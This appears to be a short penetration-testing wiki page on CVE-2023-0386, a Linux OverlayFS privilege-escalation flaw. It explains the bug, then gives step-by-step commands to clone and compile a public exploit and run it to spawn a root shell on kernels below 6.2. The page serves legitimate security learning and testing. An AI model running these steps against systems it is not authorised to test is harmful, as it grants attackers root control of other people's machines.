CVE-2023-0386

Theory

The overlay file system (often abbreviated as OverlayFS) allows a user to "merge" several mount points into a unified file system.

CVE-2023-0386 lies in the fact that when the kernel copied a file from the overlay file system to the "upper" directory, it did not check if the user/group owning this file was mapped in the current user namespace. This allows an unprivileged user to smuggle an SUID binary from a "lower" directory to the "upper" directory, by using OverlayFS as an intermediary.

Practice

The target system is likely to be vulnerable if it has a kernel version lower than 6.2.

#Get Kernel version
$ uname -r
5.15.70-051570-generic

Using this exploit from sxlmnwb, we can abuse CVE-2023-0386

#Compile
git clone https://github.com/sxlmnwb/CVE-2023-0386 && cd CVE-2023-0386
make all

Start two terminals on the target, in the first one type

./fuse ./ovlcap/lower ./gc

In the second terminal type. It will spawn a root shell.

./exp

If the target doesn't have gcc installed, you may need to recreate a similar virtual environement to compile the exploit.

References

The OverlayFS vulnerability CVE-2023-0386: Overview, detection, and remediationdatadoghq

Last updated 9 months ago